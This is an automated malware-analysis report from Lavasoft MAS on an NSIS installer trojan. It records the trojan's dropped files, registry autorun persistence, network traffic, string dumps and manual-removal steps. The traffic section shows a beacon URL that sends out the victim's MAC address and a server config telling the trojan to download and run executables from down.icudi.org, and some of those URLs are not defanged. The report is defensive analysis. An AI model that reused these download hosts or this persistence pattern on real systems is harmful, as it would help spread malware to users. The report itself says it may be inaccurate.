Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 65b966a98ffe2af8265d8c51986fb1c4
SHA1: 5a4eedaafd7e208ee7223a0fd657e9e53b255d95
SHA256: 2da986882887922b9e6666ad6b31e1408133d24cecbd2eff7ad129d32348cbed
SSDeep: 3072:tgXdZt9P6D3XJwFuPXwm9UpdfVlAqQjpt8udlfzt1sy2jVfXI:te34i2bUnTAqQjpt8GhSysQ
Size: 123703 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Applications Install
Created at: 2009-06-07 00:41:59
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):No processes have been created.The Trojan injects its code into the following process(es):
%original file name%.exe:1256
File activity
The process %original file name%.exe:1256 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\xID.dll (10 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Éõçä¯ÀÀÆ÷\Éõçä¯ÀÀÆ÷.lnk (517 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Éõçä¯ÀÀÆ÷\öÃâ€ÂØ Éõçä¯ÀÀÆ÷.lnk (675 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\open.ini (669 bytes)
%Program Files%\shandian\Unins.exe (564 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\F30241_s_0523.exe (18246 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\Md5dll.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Desktop\Éõçä¯ÀÀÆ÷.lnk (505 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\emaaif_70690.exe (13344 bytes)
%Program Files%\shandian\config.ini (194 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsf1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\F30241_s_0523.exe (0 bytes)
Registry activity
The process %original file name%.exe:1256 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Éõçä¯ÀÀÆ÷]
"DisplayName" = "Éõçä¯ÀÀÆ÷ 1.1.0.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Éõçä¯ÀÀÆ÷]
"Publisher" = "ð汸ÓÃ.nsi_nsis-2.45_76861_776315"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Éõçä¯ÀÀÆ÷]
"DisplayIcon" = "%Program Files%\shandian\Unins.exe"
"UninstallString" = "%Program Files%\shandian\Unins.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Éõçä¯ÀÀÆ÷]
"DisplayVersion" = "1.1.0.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "03 A9 7F 4A C8 17 A2 04 FB 3B 70 76 57 1B 01 D3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"shandian" = "%Program Files%\shandian\shandian.exe"
Dropped PE files
MD5 | File path |
---|---|
a7d710e78711d5ab90e4792763241754 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu2.tmp\Md5dll.dll |
254f13dfd61c5b7d2119eb2550491e1d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu2.tmp\NSISdl.dll |
00a0194c20ee912257df53bfe258ee4a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu2.tmp\System.dll |
3a5ed71aa9c6846d95d57235c4c443d7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu2.tmp\xID.dll |
a2820daae8e3494f47b72e0e7db4858f | c:\Program Files\shandian\Unins.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\xID.dll (10 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Éõçä¯ÀÀÆ÷\Éõçä¯ÀÀÆ÷.lnk (517 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Éõçä¯ÀÀÆ÷\öÃâ€ÂØ Éõçä¯ÀÀÆ÷.lnk (675 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\open.ini (669 bytes)
%Program Files%\shandian\Unins.exe (564 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\F30241_s_0523.exe (18246 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\Md5dll.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Desktop\Éõçä¯ÀÀÆ÷.lnk (505 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\emaaif_70690.exe (13344 bytes)
%Program Files%\shandian\config.ini (194 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"shandian" = "%Program Files%\shandian\shandian.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: MeinV
Product Name: ?????
Product Version: 1.1.0.0
Legal Copyright: Corporation. All rights reserved.
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.1.0.0
File Description: Installer Application
Comments: http://www.sd.com
Language: English (United States)
Company Name: MeinVProduct Name: ?????Product Version: 1.1.0.0Legal Copyright: Corporation. All rights reserved.Legal Trademarks: Original Filename: Internal Name: File Version: 1.1.0.0File Description: Installer ApplicationComments: http://www.sd.comLanguage: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23628 | 24064 | 4.46394 | 856b32eb77dfd6fb67f21d6543272da5 |
.rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
.data | 36864 | 154712 | 1024 | 3.3278 | 7922d4ce117d7d5b3ac2cffe4b0b5e4f |
.ndata | 192512 | 57344 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 249856 | 53152 | 53248 | 5.05621 | 28649a2ec7752389a3f79b519752e666 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://stat.huashui.org/stat/?v=1&ac=setup2&name=%original file name%.exe&mac=00-0C-29-FD-55-AD&md5=99be0fe99ecadbf4847eb7bfd64d76d7 | 112.124.102.171 |
down.icudi.org | 222.186.60.2 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /stat/?v=1&ac=setup2&name=%original file name%.exe&mac=00-0C-29-FD-55-AD&md5=99be0fe99ecadbf4847eb7bfd64d76d7 HTTP/1.0
Host: stat.huashui.org
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Connection: close
Date: Sat, 31 May 2014 09:26:17 GMT
Server: Microsoft-IIS/6.0
Who: ShanIE
Content-Length: 3176
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACSSDCBR=GCKPEGAAOMNIKEFIIDMEJIKO; path=/
Cache-control: private
..[s]..s=0..[Page1_1]..Task=down..Desc=..........Hint=..........Exe=F30241_s_0523.exe..URL=hXXp://down.icudi.org:99/F30241_s_0523.rar..reg=HKLM\SOFTWARE\Baidu\BaiduSd\InstallDir..[Page1_2]..Task=down..Desc=..........Hint=..........Exe=emaaif_70690.exe..URL=hXXp://down.icudi.org:99/emaaif_70690.rar..reg=HKLM\SOFTWARE\Baidu\BaiduAn\InstallDir..[Page1_3]..Task=down..Desc=......Hint=......Exe=kuping_b_54282.exe..URL=http://down.icudi.org:99/kuping_b_54282.rar..reg=HKCU\Software\Kuping\InstallPath..[Page1_4]..Task=down..Desc=..........Hint=..........Exe=pczh_98_2.exe..URL=hXXp://down.icudi.org:99/pczh_98_2.rar..reg=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Ainqngz3.9.exe\..[Page1_5]..Task=down..Desc=........Hint=........Exe=-8853_1_mvy.exe..URL=http://down.icudi.org:99/-8853_1_mvy.rar..reg=HKLM\SOFTWARE\Mnying\Mnyingfiledir..[Page1_6]..Task=down..Desc=...... ..Hint=........Exe=yxku_s[106].exe..URL=hXXp://down.icudi.org:99/yxku_s[106].rar..reg=HKCU\Software\yxkuBox\InstallPath..[Page1_7]..Task=down..Desc=......Hint=......Exe=xkss_50041.exe..URL=hXXp://down.icudi.org:99/xkss_50041.rar..reg=HKCU\Software\xuankusoso\InstallMode..[Page1_9]..Task=down..Desc=....FM..Hint=....FM..Exe=setup_3128.exe..URL=hXXp://down.icudi.org:99/setup_3128.rar..reg=HKLM\SOFTWARE\YYMusic3\rd..[Page1_11]..Task=down..Desc=..........Hint=..........Exe=BaiduPlayerNetSetup_284.exe..URL=hXXp://down.icudi.org:99/BaiduPlayerNetSetup_284.rar..reg=HKLM\SOFTWARE\MozillaPlugins\@baidu.com/npxbdyy\Path..[Page1_12]..Task=down..Desc=.........
<<
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_1256:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
http://nsis.sf.net/NSIS_Error
http://nsis.sf.net/NSIS_Error
... %d%%
... %d%%
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|<>/":
*?|<>/":
\LOCALS~1\Temp\nsu2.tmp\NSISdl.dll
\LOCALS~1\Temp\nsu2.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu2.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu2.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu2.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu2.tmp
open.ini
open.ini
.reloc
.reloc
WS2_32.dll
WS2_32.dll
NSISdl.dll
NSISdl.dll
invalid URL
invalid URL
Host: %s
Host: %s
GET %s HTTP/1.0
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
User-Agent: NSISDL/1.2 (Mozilla)
http=
http=
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Unable to open %s
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u hours remaining)
(%u minutes remaining)
(%u minutes remaining)
(%u seconds remaining)
(%u seconds remaining)
Downloading %s
Downloading %s
.vN {
.vN {
nsu2.tmp
nsu2.tmp
.exe&mac=00-0C-29-FD-55-AD&md5=99be0fe99ecadbf4847eb7bfd64d76d7
.exe&mac=00-0C-29-FD-55-AD&md5=99be0fe99ecadbf4847eb7bfd64d76d7
1.1.0.0
1.1.0.0
//down.icudi.org:99/emaaif_70690.rar
//down.icudi.org:99/emaaif_70690.rar
%original file name%.exe
%original file name%.exe
c:\%original file name%.exe
c:\%original file name%.exe
%Program Files%\shandian
%Program Files%\shandian
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf1.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
emaaif_70690.exe
emaaif_70690.exe
http://down.icudi.org:99/emaaif_70690.rar
http://down.icudi.org:99/emaaif_70690.rar
,Wc%c
,Wc%c
%SM"3
%SM"3
I.rHUJr
I.rHUJr
he.BFY^
he.BFY^
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32" /><description>Nullsoft Install System v2.45</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false" /></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" /><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" /></application></compatibility></assembly>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32" /><description>Nullsoft Install System v2.45</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false" /></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" /><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" /></application></compatibility></assembly>
%Documents and Settings%\%current user%\Desktop\
%Documents and Settings%\%current user%\Desktop\
http://www.sd.com
http://www.sd.com
1.1.0.0
1.1.0.0
%original file name%.exe_1256_rwx_10004000_00001000:
callback%d
callback%d